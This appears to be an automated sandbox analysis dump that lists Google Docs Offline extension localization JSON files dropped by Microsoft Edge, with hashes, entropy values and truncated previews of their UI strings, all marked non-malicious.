                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2230
                                                                                                                                                                            Entropy (8bit):3.8239097369647634
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                            MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                            SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                            SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                            SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1160
                                                                                                                                                                            Entropy (8bit):5.292894989863142
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                            MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                            SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                            SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                            SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3264
                                                                                                                                                                            Entropy (8bit):3.586016059431306
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                            MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                            SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                            SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                            SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3235
                                                                                                                                                                            Entropy (8bit):3.6081439490236464
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                            MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                            SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                            SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                            SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3122
                                                                                                                                                                            Entropy (8bit):3.891443295908904
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                            MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                            SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                            SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                            SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1895
                                                                                                                                                                            Entropy (8bit):4.28990403715536
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                            MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                            SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                            SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                            SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1042
                                                                                                                                                                            Entropy (8bit):5.3945675025513955
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                            MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                            SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                            SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                            SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2535
                                                                                                                                                                            Entropy (8bit):3.8479764584971368
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                            MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                            SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                            SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                            SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1028
                                                                                                                                                                            Entropy (8bit):4.797571191712988
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                            MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                            SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                            SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                            SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):994
                                                                                                                                                                            Entropy (8bit):4.700308832360794
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                            MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                            SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                            SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                            SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2091
                                                                                                                                                                            Entropy (8bit):4.358252286391144
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                            MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                            SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                            SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                            SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2778
                                                                                                                                                                            Entropy (8bit):3.595196082412897
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                            MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                            SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                            SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                            SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1719
                                                                                                                                                                            Entropy (8bit):4.287702203591075
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                            MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                            SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                            SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                            SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):936
                                                                                                                                                                            Entropy (8bit):4.457879437756106
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                            MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                            SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                            SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                            SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3830
                                                                                                                                                                            Entropy (8bit):3.5483353063347587
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                            MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                            SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                            SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                            SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                            Malicious:false
